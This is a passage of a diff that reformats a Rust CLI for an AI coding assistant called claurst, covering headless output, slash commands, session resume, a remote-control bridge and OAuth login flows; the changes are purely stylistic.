+                buf.trim().to_string()
+            };
+
+            if prompt.is_empty() {
+                eprintln!("Error: No prompt provided. Use --print <prompt> or pipe text to stdin.");
+                std::process::exit(1);
+            }
+
+            vec![claurst_core::types::Message::user(prompt)]
         };
-
-        if prompt.is_empty() {
-            eprintln!("Error: No prompt provided. Use --print <prompt> or pipe text to stdin.");
-            std::process::exit(1);
-        }
-
-        vec![claurst_core::types::Message::user(prompt)]
-    };
 
     // --prefill: inject a partial assistant turn before the query so the model
     // continues from that text (mirrors TS --prefill flag).
     if let Some(ref prefill_text) = cli.prefill {
-        messages.push(claurst_core::types::Message::assistant(prefill_text.clone()));
+        messages.push(claurst_core::types::Message::assistant(
+            prefill_text.clone(),
+        ));
     }
 
     if messages.is_empty() {
@@ -1098,7 +1109,10 @@ async fn run_headless(
         std::process::exit(1);
     }
 
-    let is_json_output = matches!(cli.output_format, CliOutputFormat::Json | CliOutputFormat::StreamJson);
+    let is_json_output = matches!(
+        cli.output_format,
+        CliOutputFormat::Json | CliOutputFormat::StreamJson
+    );
     let is_stream_json = matches!(cli.output_format, CliOutputFormat::StreamJson);
 
     let (event_tx, mut event_rx) = mpsc::unbounded_channel::<QueryEvent>();
@@ -1174,35 +1188,33 @@ async fn run_headless(
 
     // Final output
     match cli.output_format {
-        CliOutputFormat::Json => {
-            match outcome {
-                QueryOutcome::EndTurn { message, usage } => {
-                    let result_text = if full_text.is_empty() {
-                        message.get_all_text()
-                    } else {
-                        full_text
-                    };
-                    let out = serde_json::json!({
-                        "type": "result",
-                        "result": result_text,
-                        "usage": {
-                            "input_tokens": usage.input_tokens,
-                            "output_tokens": usage.output_tokens,
-                            "cache_creation_input_tokens": usage.cache_creation_input_tokens,
-                            "cache_read_input_tokens": usage.cache_read_input_tokens,
-                        },
-                        "cost_usd": cost_tracker.total_cost_usd(),
-                    });
-                    println!("{}", out);
-                }
-                QueryOutcome::Error(e) => {
-                    let out = serde_json::json!({ "type": "error", "error": e.to_string() });
-                    eprintln!("{}", out);
-                    std::process::exit(1);
-                }
-                _ => {}
+        CliOutputFormat::Json => match outcome {
+            QueryOutcome::EndTurn { message, usage } => {
+                let result_text = if full_text.is_empty() {
+                    message.get_all_text()
+                } else {
+                    full_text
+                };
+                let out = serde_json::json!({
+                    "type": "result",
+                    "result": result_text,
+                    "usage": {
+                        "input_tokens": usage.input_tokens,
+                        "output_tokens": usage.output_tokens,
+                        "cache_creation_input_tokens": usage.cache_creation_input_tokens,
+                        "cache_read_input_tokens": usage.cache_read_input_tokens,
+                    },
+                    "cost_usd": cost_tracker.total_cost_usd(),
+                });
+                println!("{}", out);
             }
-        }
+            QueryOutcome::Error(e) => {
+                let out = serde_json::json!({ "type": "error", "error": e.to_string() });
+                eprintln!("{}", out);
+                std::process::exit(1);
+            }
+            _ => {}
+        },
         CliOutputFormat::StreamJson => {
             // Already streamed above; emit final result event
             match outcome {
@@ -1241,7 +1253,10 @@ async fn run_headless(
                     eprintln!("Error: {}", e);
                     std::process::exit(1);
                 }
-                QueryOutcome::BudgetExceeded { cost_usd, limit_usd } => {
+                QueryOutcome::BudgetExceeded {
+                    cost_usd,
+                    limit_usd,
+                } => {
                     eprintln!(
                         "Budget limit ${:.4} reached (spent ${:.4}). Stopping.",
                         limit_usd, cost_usd
@@ -1273,13 +1288,12 @@ async fn run_interactive(
     has_credentials: bool,
     model_registry: Arc<claurst_api::ModelRegistry>,
 ) -> anyhow::Result<()> {
-    use claurst_commands::{execute_command, CommandContext, CommandResult};
     use claurst_bridge::{BridgeOutbound, TuiBridgeEvent};
+    use claurst_commands::{execute_command, CommandContext, CommandResult};
     use claurst_query::{QueryEvent, QueryOutcome};
     use claurst_tui::{
-        bridge_state::BridgeConnectionState, notifications::NotificationKind,
-        render::render_app, restore_terminal, setup_terminal, App,
-        device_auth_dialog::DeviceAuthEvent,
+        bridge_state::BridgeConnectionState, device_auth_dialog::DeviceAuthEvent,
+        notifications::NotificationKind, render::render_app, restore_terminal, setup_terminal, App,
     };
     use crossterm::event::{self, Event, KeyCode};
     use std::time::Duration;
@@ -1304,20 +1318,18 @@ async fn run_interactive(
             }
             Err(e) => {
                 eprintln!("Warning: could not load session {}: {}", id, e);
-                let mut session =
-                    claurst_core::history::ConversationSession::new(
-                        claurst_api::effective_model_for_config(&config, &model_registry),
-                    );
+                let mut session = claurst_core::history::ConversationSession::new(
+                    claurst_api::effective_model_for_config(&config, &model_registry),
+                );
                 session.id = tool_ctx.session_id.clone();
                 session.working_dir = Some(tool_ctx.working_dir.display().to_string());
                 session
             }
         }
     } else {
-        let mut session =
-            claurst_core::history::ConversationSession::new(
-                claurst_api::effective_model_for_config(&config, &model_registry),
-            );
+        let mut session = claurst_core::history::ConversationSession::new(
+            claurst_api::effective_model_for_config(&config, &model_registry),
+        );
         session.id = tool_ctx.session_id.clone();
         session.working_dir = Some(tool_ctx.working_dir.display().to_string());
         session
@@ -1337,10 +1349,10 @@ async fn run_interactive(
     if let Some(level) = base_query_config.effort_level {
         use claurst_tui::EffortLevel as TuiEL;
         app.effort_level = match level {
-            claurst_core::effort::EffortLevel::Low    => TuiEL::Low,
+            claurst_core::effort::EffortLevel::Low => TuiEL::Low,
             claurst_core::effort::EffortLevel::Medium => TuiEL::Normal,
-            claurst_core::effort::EffortLevel::High   => TuiEL::High,
-            claurst_core::effort::EffortLevel::Max    => TuiEL::Max,
+            claurst_core::effort::EffortLevel::High => TuiEL::High,
+            claurst_core::effort::EffortLevel::Max => TuiEL::Max,
         };
     }
     app.provider_registry = base_query_config.provider_registry.clone();
@@ -1392,7 +1404,8 @@ async fn run_interactive(
         if !settings.has_completed_onboarding {
             app.onboarding_dialog.show();
         } else {
-            app.status_message = Some("No provider configured. Run /connect to set one up.".to_string());
+            app.status_message =
+                Some("No provider configured. Run /connect to set one up.".to_string());
         }
     } else if !settings.has_completed_onboarding {
         // User has credentials but hasn't formally completed onboarding — mark it done
@@ -1466,9 +1479,7 @@ async fn run_interactive(
 
     // Preserve the bridge token before consuming bridge_config so we can reconstruct
     // a BridgeSessionInfo once the bridge worker reports it has connected.
-    let bridge_token: Option<String> = bridge_config
-        .as_ref()
-        .and_then(|c| c.session_token.clone());
+    let bridge_token: Option<String> = bridge_config.as_ref().and_then(|c| c.session_token.clone());
 
     let mut bridge_runtime: Option<BridgeRuntime> = if let Some(cfg) = bridge_config {
         let bridge_cancel = CancellationToken::new();
@@ -1480,7 +1491,9 @@ async fn run_interactive(
 
         let cancel_clone = bridge_cancel.clone();
         tokio::spawn(async move {
-            if let Err(e) = claurst_bridge::run_bridge_loop(cfg, tui_tx, outbound_rx, cancel_clone).await {
+            if let Err(e) =
+                claurst_bridge::run_bridge_loop(cfg, tui_tx, outbound_rx, cancel_clone).await
+            {
                 warn!("Bridge loop exited with error: {}", e);
             }
         });
@@ -1570,10 +1583,13 @@ async fn run_interactive(
 
                     // Ctrl+C: copy selected text if there's a selection, otherwise cancel/quit
                     if key.code == KeyCode::Char('c')
-                        && key.modifiers.contains(crossterm::event::KeyModifiers::CONTROL)
+                        && key
+                            .modifiers
+                            .contains(crossterm::event::KeyModifiers::CONTROL)
                     {
                         // Check if there's an active text selection — copy instead of cancel/quit
-                        let has_selection = app.selection_anchor.is_some() && !app.selection_text.borrow().is_empty();
+                        let has_selection = app.selection_anchor.is_some()
+                            && !app.selection_text.borrow().is_empty();
                         if has_selection {
                             // Let the app handle the copy via its normal key handler
                             app.handle_key_event(key);
@@ -1595,7 +1611,9 @@ async fn run_interactive(
 
                     // Ctrl+D on empty input => quit
                     if key.code == KeyCode::Char('d')
-                        && key.modifiers.contains(crossterm::event::KeyModifiers::CONTROL)
+                        && key
+                            .modifiers
+                            .contains(crossterm::event::KeyModifiers::CONTROL)
                         && app.prompt_input.is_empty()
                     {
                         break 'main;
@@ -1667,8 +1685,15 @@ async fn run_interactive(
                             let skip_tui_for_args = !cmd_args.is_empty()
                                 && matches!(
                                     cmd_name.as_str(),
-                                    "model" | "theme" | "resume" | "session"
-                                        | "vim" | "vi" | "voice" | "fast" | "speed"
+                                    "model"
+                                        | "theme"
+                                        | "resume"
+                                        | "session"
+                                        | "vim"
+                                        | "vi"
+                                        | "voice"
+                                        | "fast"
+                                        | "speed"
                                 );
                             let handled_by_tui = if skip_tui_for_args {
                                 false
@@ -1680,14 +1705,18 @@ async fn run_interactive(
                             // (no-args /effort → cycle Low→Med→High→Max→Low).
                             if handled_by_tui && cmd_name == "effort" && cmd_args.is_empty() {
                                 current_effort = Some(match app.effort_level {
-                                    claurst_tui::EffortLevel::Low =>
-                                        claurst_core::effort::EffortLevel::Low,
-                                    claurst_tui::EffortLevel::Normal =>
-                                        claurst_core::effort::EffortLevel::Medium,
-                                    claurst_tui::EffortLevel::High =>
-                                        claurst_core::effort::EffortLevel::High,
-                                    claurst_tui::EffortLevel::Max =>
-                                        claurst_core::effort::EffortLevel::Max,
+                                    claurst_tui::EffortLevel::Low => {
+                                        claurst_core::effort::EffortLevel::Low
+                                    }
+                                    claurst_tui::EffortLevel::Normal => {
+                                        claurst_core::effort::EffortLevel::Medium
+                                    }
+                                    claurst_tui::EffortLevel::High => {
+                                        claurst_core::effort::EffortLevel::High
+                                    }
+                                    claurst_tui::EffortLevel::Max => {
+                                        claurst_core::effort::EffortLevel::Max
+                                    }
                                 });
                             }
 
@@ -1715,12 +1744,10 @@ async fn run_interactive(
                                     app.replace_messages(Vec::new());
                                     session.messages.clear();
                                     session.updated_at = chrono::Utc::now();
-                                    app.status_message =
-                                        Some("Conversation cleared.".to_string());
+                                    app.status_message = Some("Conversation cleared.".to_string());
                                 }
                                 Some(CommandResult::SetMessages(new_msgs)) => {
-                                    let removed =
-                                        messages.len().saturating_sub(new_msgs.len());
+                                    let removed = messages.len().saturating_sub(new_msgs.len());
                                     messages = new_msgs.clone();
                                     app.replace_messages(new_msgs);
                                     session.messages = messages.clone();
@@ -1759,44 +1786,34 @@ async fn run_interactive(
                                     tool_ctx.file_history = Arc::new(ParkingMutex::new(
                                         claurst_core::file_history::FileHistory::new(),
                                     ));
-                                    tool_ctx.current_turn = Arc::new(
-                                        std::sync::atomic::AtomicUsize::new(0),
-                                    );
+                                    tool_ctx.current_turn =
+                                        Arc::new(std::sync::atomic::AtomicUsize::new(0));
                                     cmd_ctx.session_id = session.id.clone();
                                     cmd_ctx.session_title = session.title.clone();
                                     if let Some(saved_dir) = session.working_dir.as_ref() {
-                                        let saved_path =
-                                            std::path::PathBuf::from(saved_dir);
+                                        let saved_path = std::path::PathBuf::from(saved_dir);
                                         if saved_path.exists() {
                                             tool_ctx.working_dir = saved_path.clone();
                                             cmd_ctx.working_dir = saved_path;
                                         }
                                     }
-                                    app.config.project_dir =
-                                        Some(tool_ctx.working_dir.clone());
+                                    app.config.project_dir = Some(tool_ctx.working_dir.clone());
                                     app.attach_turn_diff_state(
                                         tool_ctx.file_history.clone(),
                                         tool_ctx.current_turn.clone(),
                                     );
-                                    claurst_tui::update_terminal_title(
-                                        session.title.as_deref(),
-                                    );
-                                    app.status_message = Some(format!(
-                                        "Resumed session {}.",
-                                        &session.id[..8]
-                                    ));
+                                    claurst_tui::update_terminal_title(session.title.as_deref());
+                                    app.status_message =
+                                        Some(format!("Resumed session {}.", &session.id[..8]));
                                 }
                                 Some(CommandResult::RenameSession(title)) => {
                                     session.title = Some(title.clone());
                                     session.updated_at = chrono::Utc::now();
                                     cmd_ctx.session_title = session.title.clone();
-                                    let _ =
-                                        claurst_core::history::save_session(&session).await;
+                                    let _ = claurst_core::history::save_session(&session).await;
                                     claurst_tui::update_terminal_title(Some(&title));
-                                    app.status_message = Some(format!(
-                                        "Session renamed to \"{}\".",
-                                        title
-                                    ));
+                                    app.status_message =
+                                        Some(format!("Session renamed to \"{}\".", title));
                                 }
                                 Some(CommandResult::RefreshProviderState) => {
                                     if app.is_streaming || current_query.is_some() {
@@ -1805,7 +1822,8 @@ async fn run_interactive(
                                                 .to_string(),
                                         );
                                     } else {
-                                        match refresh_provider_runtime_state(&cmd_ctx.config).await {
+                                        match refresh_provider_runtime_state(&cmd_ctx.config).await
+                                        {
                                             Ok(refreshed) => {
                                                 cmd_ctx.config = refreshed.config.clone();
                                                 tool_ctx.config = refreshed.config.clone();
@@ -1836,10 +1854,8 @@ async fn run_interactive(
                                                 );
                                             }
                                             Err(err) => {
-                                                app.status_message = Some(format!(
-                                                    "Error: {}",
-                                                    err
-                                                ));
+                                                app.status_message =
+                                                    Some(format!("Error: {}", err));
                                             }
                                         }
                                     }
@@ -1854,9 +1870,9 @@ async fn run_interactive(
                                     // overlay for this command (e.g. /stats opens dialog
                                     // AND would push a text message — drop the text).
                                     if !handled_by_tui {
-                                        app.push_message(
-                                            claurst_core::types::Message::assistant(msg),
-                                        );
+                                        app.push_message(claurst_core::types::Message::assistant(
+                                            msg,
+                                        ));
                                     }
                                 }
                                 Some(CommandResult::ConfigChange(new_cfg)) => {
@@ -1868,7 +1884,8 @@ async fn run_interactive(
                                         app.model_name = model.clone();
                                     }
                                     // Sync fast_mode visual indicator.
-                                    app.fast_mode = new_cfg.model
+                                    app.fast_mode = new_cfg
+                                        .model
                                         .as_deref()
                                         .map(|m| m.contains("haiku"))
                                         .unwrap_or(false);
@@ -1877,8 +1894,7 @@ async fn run_interactive(
                                         new_cfg.permission_mode,
                                         claurst_core::config::PermissionMode::Plan
                                     );
-                                    app.status_message =
-                                        Some("Configuration updated.".to_string());
+                                    app.status_message = Some("Configuration updated.".to_string());
                                 }
                                 Some(CommandResult::ConfigChangeMessage(new_cfg, msg)) => {
                                     cmd_ctx.config = new_cfg.clone();
@@ -1900,11 +1916,7 @@ async fn run_interactive(
                                 }
                                 Some(CommandResult::StartOAuthFlow(with_claude_ai)) => {
                                     claurst_tui::restore_terminal(&mut terminal).ok();
-                                    match oauth_flow::run_oauth_login_flow(
-                                        with_claude_ai,
-                                    )
-                                    .await
-                                    {
+                                    match oauth_flow::run_oauth_login_flow(with_claude_ai).await {
                                         Ok(_) => {
                                             app.status_message =
                                                 Some("Login successful!".to_string());
@@ -1930,23 +1942,24 @@ async fn run_interactive(
 
                             // Sync effort visual + API level when CLI handled
                             // /effort with explicit args (/effort high).
-                            if handled_by_cli
-                                && cmd_name == "effort"
-                                && !cmd_args.is_empty()
-                            {
+                            if handled_by_cli && cmd_name == "effort" && !cmd_args.is_empty() {
                                 if let Some(level) =
                                     claurst_core::effort::EffortLevel::from_str(&cmd_args)
                                 {
                                     current_effort = Some(level);
                                     app.effort_level = match level {
-                                        claurst_core::effort::EffortLevel::Low =>
-                                            claurst_tui::EffortLevel::Low,
-                                        claurst_core::effort::EffortLevel::Medium =>
-                                            claurst_tui::EffortLevel::Normal,
-                                        claurst_core::effort::EffortLevel::High =>
-                                            claurst_tui::EffortLevel::High,
-                                        claurst_core::effort::EffortLevel::Max =>
-                                            claurst_tui::EffortLevel::Max,
+                                        claurst_core::effort::EffortLevel::Low => {
+                                            claurst_tui::EffortLevel::Low
+                                        }
+                                        claurst_core::effort::EffortLevel::Medium => {
+                                            claurst_tui::EffortLevel::Normal
+                                        }
+                                        claurst_core::effort::EffortLevel::High => {
+                                            claurst_tui::EffortLevel::High
+                                        }
+                                        claurst_core::effort::EffortLevel::Max => {
+                                            claurst_tui::EffortLevel::Max
+                                        }
                                     };
                                     app.status_message = Some(format!(
                                         "Effort: {} {}",
@@ -1966,10 +1979,8 @@ async fn run_interactive(
                             }
 
                             if !handled_by_cli && !handled_by_tui {
-                                app.status_message = Some(format!(
-                                    "Unknown command: /{}",
-                                    cmd_name
-                                ));
+                                app.status_message =
+                                    Some(format!("Unknown command: /{}", cmd_name));
                             }
 
                             // If a UserMessage was queued (e.g. /compact), submit it.
@@ -2009,18 +2020,21 @@ async fn run_interactive(
                             let mut blocks: Vec<claurst_core::types::ContentBlock> = pending_imgs
                                 .iter()
                                 .filter_map(|img| {
-                                    claurst_tui::image_paste::encode_image_base64(&img.path)
-                                        .map(|b64| claurst_core::types::ContentBlock::Image {
+                                    claurst_tui::image_paste::encode_image_base64(&img.path).map(
+                                        |b64| claurst_core::types::ContentBlock::Image {
                                             source: claurst_core::types::ImageSource {
                                                 source_type: "base64".to_string(),
                                                 media_type: Some("image/png".to_string()),
                                                 data: Some(b64),
                                                 url: None,
                                             },
-                                        })
+                                        },
+                                    )
                                 })
                                 .collect();
-                            blocks.push(claurst_core::types::ContentBlock::Text { text: input.clone() });
+                            blocks.push(claurst_core::types::ContentBlock::Text {
+                                text: input.clone(),
+                            });
                             claurst_core::types::Message::user_blocks(blocks)
                         };
                         messages.push(user_msg.clone());
@@ -2052,7 +2066,10 @@ async fn run_interactive(
                         let tools_arc_clone = tools_arc.clone();
                         let ctx_clone = tool_ctx.clone();
                         let mut qcfg = base_query_config.clone();
-                        qcfg.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry);
+                        qcfg.model = claurst_api::effective_model_for_config(
+                            &cmd_ctx.config,
+                            &model_registry,
+                        );
                         qcfg.max_tokens = cmd_ctx.config.effective_max_tokens();
                         qcfg.append_system_prompt = cmd_ctx.config.append_system_prompt.clone();
                         qcfg.system_prompt = base_query_config.system_prompt.clone();
@@ -2146,26 +2163,31 @@ async fn run_interactive(
                         delta: text.clone(),
                         message_id: format!("msg-{}", index),
                     }),
-                    QueryEvent::ToolStart { tool_name, tool_id, input_json } => {
-                        Some(BridgeOutbound::ToolStart {
-                            id: tool_id.clone(),
-                            name: tool_name.clone(),
-                            input_preview: Some(input_json.clone()),
-                        })
-                    }
-                    QueryEvent::ToolEnd { tool_id, result, is_error, .. } => {
-                        Some(BridgeOutbound::ToolEnd {
-                            id: tool_id.clone(),
-                            output: result.clone(),
-                            is_error: *is_error,
-                        })
-                    }
-                    QueryEvent::TurnComplete { stop_reason, turn, .. } => {
-                        Some(BridgeOutbound::TurnComplete {
-                            message_id: format!("turn-{}", turn),
-                            stop_reason: stop_reason.clone(),
-                        })
-                    }
+                    QueryEvent::ToolStart {
+                        tool_name,
+                        tool_id,
+                        input_json,
+                    } => Some(BridgeOutbound::ToolStart {
+                        id: tool_id.clone(),
+                        name: tool_name.clone(),
+                        input_preview: Some(input_json.clone()),
+                    }),
+                    QueryEvent::ToolEnd {
+                        tool_id,
+                        result,
+                        is_error,
+                        ..
+                    } => Some(BridgeOutbound::ToolEnd {
+                        id: tool_id.clone(),
+                        output: result.clone(),
+                        is_error: *is_error,
+                    }),
+                    QueryEvent::TurnComplete {
+                        stop_reason, turn, ..
+                    } => Some(BridgeOutbound::TurnComplete {
+                        message_id: format!("turn-{}", turn),
+                        stop_reason: stop_reason.clone(),
+                    }),
                     QueryEvent::Error(msg) => Some(BridgeOutbound::Error {
                         message: msg.clone(),
                     }),
@@ -2182,27 +2204,41 @@ async fn run_interactive(
                     QueryEvent::Stream(claurst_api::AnthropicStreamEvent::ContentBlockDelta {
                         delta: claurst_api::streaming::ContentDelta::TextDelta { text },
                         ..
-                    }) => Some(serde_json::json!({
-                        "type": "text_chunk",
-                        "text": text,
-                    }).to_string()),
-                    QueryEvent::ToolStart { tool_name, tool_id, input_json } => {
-                        Some(serde_json::json!({
+                    }) => Some(
+                        serde_json::json!({
+                            "type": "text_chunk",
+                            "text": text,
+                        })
+                        .to_string(),
+                    ),
+                    QueryEvent::ToolStart {
+                        tool_name,
+                        tool_id,
+                        input_json,
+                    } => Some(
+                        serde_json::json!({
                             "type": "tool_start",
                             "tool_name": tool_name,
                             "tool_id": tool_id,
                             "input": input_json,
-                        }).to_string())
-                    }
-                    QueryEvent::ToolEnd { tool_name, tool_id, result, is_error } => {
-                        Some(serde_json::json!({
+                        })
+                        .to_string(),
+                    ),
+                    QueryEvent::ToolEnd {
+                        tool_name,
+                        tool_id,
+                        result,
+                        is_error,
+                    } => Some(
+                        serde_json::json!({
                             "type": "tool_end",
                             "tool_name": tool_name,
                             "tool_id": tool_id,
                             "result": result,
                             "is_error": is_error,
-                        }).to_string())
-                    }
+                        })
+                        .to_string(),
+                    ),
                     _ => None,
                 };
                 if let Some(payload) = relay_payload {
@@ -2219,7 +2255,8 @@ async fn run_interactive(
             && current_query.is_none()
             && !app.auto_compact_running
         {
-            let used_pct = (app.context_used_tokens as f64 / app.context_window_size as f64 * 100.0) as u64;
+            let used_pct =
+                (app.context_used_tokens as f64 / app.context_window_size as f64 * 100.0) as u64;
             if used_pct >= 99 {
                 app.auto_compact_running = true;
                 let msg_count = messages.len();
@@ -2245,7 +2282,8 @@ async fn run_interactive(
                 let tools_arc_clone = tools_arc.clone();
                 let ctx_clone = tool_ctx.clone();
                 let mut qcfg = base_query_config.clone();
-                qcfg.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry);
+                qcfg.model =
+                    claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry);
                 qcfg.max_tokens = cmd_ctx.config.effective_max_tokens();
                 let tracker = cost_tracker.clone();
                 let tx = event_tx.clone();
@@ -2278,7 +2316,10 @@ async fn run_interactive(
         if let Some(runtime) = bridge_runtime.as_mut() {
             loop {
                 match runtime.tui_rx.try_recv() {
-                    Ok(TuiBridgeEvent::Connected { session_url, session_id: conn_sid }) => {
+                    Ok(TuiBridgeEvent::Connected {
+                        session_url,
+                        session_id: conn_sid,
+                    }) => {
                         let short = if session_url.len() > 60 {
                             format!("{}…", &session_url[..60])
                         } else {
@@ -2318,11 +2359,9 @@ async fn run_interactive(
                                 tokio::spawn(async move {
                                     let mut rx = rx;
                                     while let Some(payload) = rx.recv().await {
-                                        let _ = claurst_bridge::post_bridge_event(
-                                            &info_relay,
-                                            payload,
-                                        )
-                                        .await;
+                                        let _ =
+                                            claurst_bridge::post_bridge_event(&info_relay, payload)
+                                                .await;
                                     }
                                 });
                             }
@@ -2356,10 +2395,7 @@ async fn run_interactive(
                                         }
                                         _ => {}
                                     }
-                                    tokio::time::sleep(
-                                        std::time::Duration::from_secs(2),
-                                    )
-                                    .await;
+                                    tokio::time::sleep(std::time::Duration::from_secs(2)).await;
                                 }
                             });
                         }
@@ -2399,7 +2435,10 @@ async fn run_interactive(
                         let tools_arc_clone = tools_arc.clone();
                         let ctx_clone = tool_ctx.clone();
                         let mut qcfg = base_query_config.clone();
-                        qcfg.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry);
+                        qcfg.model = claurst_api::effective_model_for_config(
+                            &cmd_ctx.config,
+                            &model_registry,
+                        );
                         qcfg.max_tokens = cmd_ctx.config.effective_max_tokens();
                         let tracker = cost_tracker.clone();
                         let tx = event_tx.clone();
@@ -2429,18 +2468,21 @@ async fn run_interactive(
                                 ct.cancel();
                             }
                             app.is_streaming = false;
-                            app.status_message =
-                                Some("Cancelled by remote control.".to_string());
+                            app.status_message = Some("Cancelled by remote control.".to_string());
                         }
                     }
-                    Ok(TuiBridgeEvent::PermissionResponse { tool_use_id, response }) => {
+                    Ok(TuiBridgeEvent::PermissionResponse {
+                        tool_use_id,
+                        response,
+                    }) => {
                         // Resolve a pending permission dialog if IDs match.
                         if let Some(ref pr) = app.permission_request {
                             if pr.tool_use_id == tool_use_id {
                                 use claurst_bridge::PermissionResponseKind;
                                 let _allow = matches!(
                                     response,
-                                    PermissionResponseKind::Allow | PermissionResponseKind::AllowSession
+                                    PermissionResponseKind::Allow
+                                        | PermissionResponseKind::AllowSession
                                 );
                                 app.permission_request = None;
                             }
@@ -2507,7 +2549,8 @@ async fn run_interactive(
                 let tools_arc_clone = tools_arc.clone();
                 let ctx_clone = tool_ctx.clone();
                 let mut qcfg = base_query_config.clone();
-                qcfg.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry);
+                qcfg.model =
+                    claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry);
                 qcfg.max_tokens = cmd_ctx.config.effective_max_tokens();
                 let tracker = cost_tracker.clone();
                 let tx = event_tx.clone();
@@ -2570,14 +2613,18 @@ async fn run_interactive(
                             COPILOT_CLIENT_ID,
                             "read:user",
                             "https://github.com/login/device/code",
-                        ).await {
+                        )
+                        .await
+                        {
                             Ok(resp) => {
-                                let _ = tx2.send(DeviceAuthEvent::GotCode {
-                                    user_code: resp.user_code,
-                                    verification_uri: resp.verification_uri,
-                                    device_code: resp.device_code.clone(),
-                                    interval: resp.interval,
-                                }).await;
+                                let _ = tx2
+                                    .send(DeviceAuthEvent::GotCode {
+                                        user_code: resp.user_code,
+                                        verification_uri: resp.verification_uri,
+                                        device_code: resp.device_code.clone(),
+                                        interval: resp.interval,
+                                    })
+                                    .await;
                                 // Step 2: Poll for access token
                                 match claurst_core::device_code::poll_for_token(
                                     COPILOT_CLIENT_ID,
@@ -2585,9 +2632,12 @@ async fn run_interactive(
                                     "https://github.com/login/oauth/access_token",
                                     resp.interval,
                                     300,
-                                ).await {
+                                )
+                                .await
+                                {
                                     Ok(token) => {
-                                        let _ = tx2.send(DeviceAuthEvent::TokenReceived(token)).await;
+                                        let _ =
+                                            tx2.send(DeviceAuthEvent::TokenReceived(token)).await;
                                     }
                                     Err(e) => {
                                         let _ = tx2.send(DeviceAuthEvent::Error(e)).await;
@@ -2606,10 +2656,13 @@ async fn run_interactive(
                     // Claurst does not have its own registered OAuth app with Anthropic.
                     // Users should use an API key from console.anthropic.com instead.
                     tokio::spawn(async move {
-                        let _ = tx2.send(DeviceAuthEvent::Error(
-                            "Anthropic OAuth requires a registered application.\n\
-                             Use an API key instead: console.anthropic.com/settings/keys".to_string()
-                        )).await;
+                        let _ = tx2
+                            .send(DeviceAuthEvent::Error(
+                                "Anthropic OAuth requires a registered application.\n\
+                             Use an API key instead: console.anthropic.com/settings/keys"
+                                    .to_string(),
+                            ))
+                            .await;
                     });
                 }
                 "openai-codex" => {
@@ -2623,14 +2676,17 @@ async fn run_interactive(
                     tokio::spawn(async move {
                         match crate::codex_oauth_flow::run_oauth_flow().await {
                             Ok(tokens) => {
-                                let _ = tx2.send(DeviceAuthEvent::TokenReceived(
-                                    tokens.access_token,
-                                )).await;
+                                let _ = tx2
+                                    .send(DeviceAuthEvent::TokenReceived(tokens.access_token))
+                                    .await;
                             }
                             Err(e) => {
-                                let _ = tx2.send(DeviceAuthEvent::Error(
-                                    format!("Codex OAuth failed: {}", e),
-                                )).await;
+                                let _ = tx2
+                                    .send(DeviceAuthEvent::Error(format!(
+                                        "Codex OAuth failed: {}",
+                                        e
+                                    )))
+                                    .await;
                             }
                         }
                     });
@@ -2658,8 +2714,12 @@ async fn run_interactive(
                     // Auto-open the verification URL in the browser
                     let _ = open::that(&verification_uri);
 
-                    app.device_auth_dialog
-                        .set_code(user_code, verification_uri, device_code, interval);
+                    app.device_auth_dialog.set_code(
+                        user_code,
+                        verification_uri,
+                        device_code,
+                        interval,
+                    );
 
                     app.notifications.push(
                         claurst_tui::NotificationKind::Info,
@@ -2690,7 +2750,8 @@ async fn run_interactive(
                 messages = msgs_arc.lock().await.clone();
                 session.messages = messages.clone();
                 session.updated_at = chrono::Utc::now();
-                session.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry);
+                session.model =
+                    claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry);
                 session.working_dir = Some(tool_ctx.working_dir.display().to_string());
                 app.is_streaming = false;
                 app.status_message = None;
@@ -2716,8 +2777,16 @@ async fn run_interactive(
                         for msg in &session.messages {
                             let content_str = match &msg.content {
                                 claurst_core::types::MessageContent::Text(t) => t.clone(),
-                                claurst_core::types::MessageContent::Blocks(blocks) => blocks.iter()
-                                    .filter_map(|b| if let claurst_core::types::ContentBlock::Text { text } = b { Some(text.as_str()) } else { None })
+                                claurst_core::types::MessageContent::Blocks(blocks) => blocks
+                                    .iter()
+                                    .filter_map(|b| {
+                                        if let claurst_core::types::ContentBlock::Text { text } = b
+                                        {
+                                            Some(text.as_str())
+                                        } else {
+                                            None
+                                        }
+                                    })
                                     .collect::<Vec<_>>()
                                     .join(" "),
                             };
@@ -2726,7 +2795,8 @@ async fn run_interactive(
                                 claurst_core::types::Role::Assistant => "assistant",
                             };
                             let msg_id = msg.uuid.as_deref().unwrap_or("unknown");
-                            let _ = store.save_message(&session.id, msg_id, role, &content_str, None);
+                            let _ =
+                                store.save_message(&session.id, msg_id, role, &content_str, None);
                         }
                     }
                 }
@@ -2820,7 +2890,9 @@ async fn handle_auth_command(args: &[String]) -> anyhow::Result<()> {
             eprintln!("Unknown auth subcommand: '{}'", unknown);
             eprintln!();
             eprintln!("Usage: claude auth <subcommand>");
-            eprintln!("  login [--console]   Authenticate (claude.ai by default; --console for API key)");
+            eprintln!(
+                "  login [--console]   Authenticate (claude.ai by default; --console for API key)"
+            );
             eprintln!("  logout              Remove stored credentials");
             eprintln!("  status [--json]     Show authentication status");
             std::process::exit(1);
@@ -2841,7 +2913,9 @@ async fn handle_auth_command(args: &[String]) -> anyhow::Result<()> {
 /// Print current auth status, then exit with code 0 (logged in) or 1 (not logged in).
 async fn auth_status(json_output: bool) {
     // Gather auth state
-    let env_api_key = std::env::var("ANTHROPIC_API_KEY").ok().filter(|k| !k.is_empty());
+    let env_api_key = std::env::var("ANTHROPIC_API_KEY")
+        .ok()
+        .filter(|k| !k.is_empty());
     let settings = Settings::load().await.unwrap_or_default();
     let settings_api_key = settings.config.api_key.clone().filter(|k| !k.is_empty());
     let oauth_tokens = claurst_core::oauth::OAuthTokens::load().await;
@@ -2898,7 +2972,11 @@ async fn auth_status(json_output: bool) {
     // Determine auth method (mirrors TypeScript authStatus())
     let (auth_method, logged_in) = if let Some(ref tokens) = oauth_tokens {
         let uses_bearer = tokens.uses_bearer_auth();
-        let method = if uses_bearer { "claude.ai" } else { "oauth_token" };
+        let method = if uses_bearer {
+            "claude.ai"
+        } else {
+            "oauth_token"
+        };
         (method.to_string(), true)
     } else if env_api_key.is_some() {
